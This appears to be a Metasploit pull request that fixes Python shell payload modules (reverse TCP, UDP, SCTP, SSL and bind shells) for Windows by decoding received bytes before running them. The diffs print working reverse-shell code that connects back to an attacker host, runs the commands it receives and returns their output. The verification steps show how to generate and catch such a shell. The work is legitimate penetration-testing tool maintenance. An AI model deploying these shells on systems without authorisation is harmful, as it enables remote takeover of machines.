### PR TITLE
changing payload structure of python's reverse_tcp for fixing windows…

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -61,7 +61,7 @@ module MetasploitModule
     cmd += "while not #{dead}:\n"
     cmd += "\tdata=s.recv(1024)\n"
     cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
-    cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
+    cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
     "#{datastore['PythonPath']} -c \"#{ py_create_exec_stub(cmd) }\""

--- a/modules/payloads/singles/python/shell_bind_tcp.rb
+++ b/modules/payloads/singles/python/shell_bind_tcp.rb
@@ -42,7 +42,7 @@ module MetasploitModule
       	d=so.recv(1024)
       	if len(d)==0:
       		break
-      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      	p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
       	o=p.stdout.read()+p.stderr.read()
       	so.send(o)
     PYTHON

--- a/modules/payloads/singles/python/shell_reverse_sctp.rb
+++ b/modules/payloads/singles/python/shell_reverse_sctp.rb
@@ -51,7 +51,7 @@ module MetasploitModule
         d=so.recv(1024)
         if len(d)==0:
           break
-        p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+        p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
         o=p.stdout.read()+p.stderr.read()
         try:
           so.send(o)

--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -48,12 +48,12 @@ module MetasploitModule
       so=s.socket(s.AF_INET,s.SOCK_STREAM)
       so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
       while True:
-        d=so.recv(1024)
-        if len(d)==0:
-            break
-        p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
-        o=p.stdout.read()+p.stderr.read()
-        so.send(o)
+      	d=so.recv(1024)
+      	if len(d)==0:
+      		break
+      	p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      	o=p.stdout.read()+p.stderr.read()
+      	so.send(o)
     PYTHON
 
     py_create_exec_stub(cmd)

--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -45,15 +45,19 @@ module MetasploitModule
     cmd = <<~PYTHON
       import socket as s
       import subprocess as r
+      import platform
       so=s.socket(s.AF_INET,s.SOCK_STREAM)
       so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
       while True:
-      	d=so.recv(1024)
-      	if len(d)==0:
-      		break
-      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
-      	o=p.stdout.read()+p.stderr.read()
-      	so.send(o)
+        d=so.recv(1024)
+        if len(d)==0:
+          break
+        if platform.system()=='Windows':
+          p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+        else:
+          p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+        o=p.stdout.read()+p.stderr.read()
+        so.send(o)
     PYTHON
 
     py_create_exec_stub(cmd)

--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -45,17 +45,13 @@ module MetasploitModule
     cmd = <<~PYTHON
       import socket as s
       import subprocess as r
-      import platform
       so=s.socket(s.AF_INET,s.SOCK_STREAM)
       so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
       while True:
         d=so.recv(1024)
         if len(d)==0:
-          break
-        if platform.system()=='Windows':
-          p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
-        else:
-          p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+            break
+        p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
         o=p.stdout.read()+p.stderr.read()
         so.send(o)
     PYTHON

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -53,7 +53,7 @@ module MetasploitModule
       	d=so.recv(1024)
       	if len(d)==0:
       		break
-      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      	p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
       	o=p.stdout.read()+p.stderr.read()
       	so.sendall(o)
     PYTHON

--- a/modules/payloads/singles/python/shell_reverse_udp.rb
+++ b/modules/payloads/singles/python/shell_reverse_udp.rb
@@ -52,7 +52,7 @@ module MetasploitModule
       	d=so.recv(1024)
       	if len(d)==0:
       		break
-      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      	p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
       	o=p.stdout.read()+p.stderr.read()
     PYTHON
 


### PR DESCRIPTION
Fixes #18029 where python reverse_tcp for windows is failing due to  `bytes args is not allowed on Windows`. So converted the bytes args to string on windows OS.

## Verification

List the steps needed to make sure this thing works

After fix

- [x] Start `msfconsole`
- [x] `use python/shell_reverse_tcp`
- [x] `set LHOST <ip>`
- [x] `set LPORT <port>`
- [x] **generate -f raw -o shell.py**
- [x] `to_handler` 
- [x] **Verify that you got a sessions**
- [x] `sessions`

```

Active sessions
===============

  Id  Name  Type                 Information  Connection
  --  ----  ----                 -----------  ----------
  1         shell python/python               <connection_info>
``` 


Normal Flow

- [x] Start `msfconsole`
- [x] `use python/shell_reverse_tcp`
- [x] `set LHOST <ip>`
- [x] `set LPORT <port>`
- [x] **generate -f raw -o shell.py**
- [x] `to_handler` 
- [x] **Verify that you got a sessions**
- [x] `sessions`

```
  File "C:\Python311\Lib\subprocess.py", line 1425, in _execute_child
    raise TypeError('bytes args is not allowed on Windows')
TypeError: bytes args is not allowed on Windows

Without getting any session
``` 
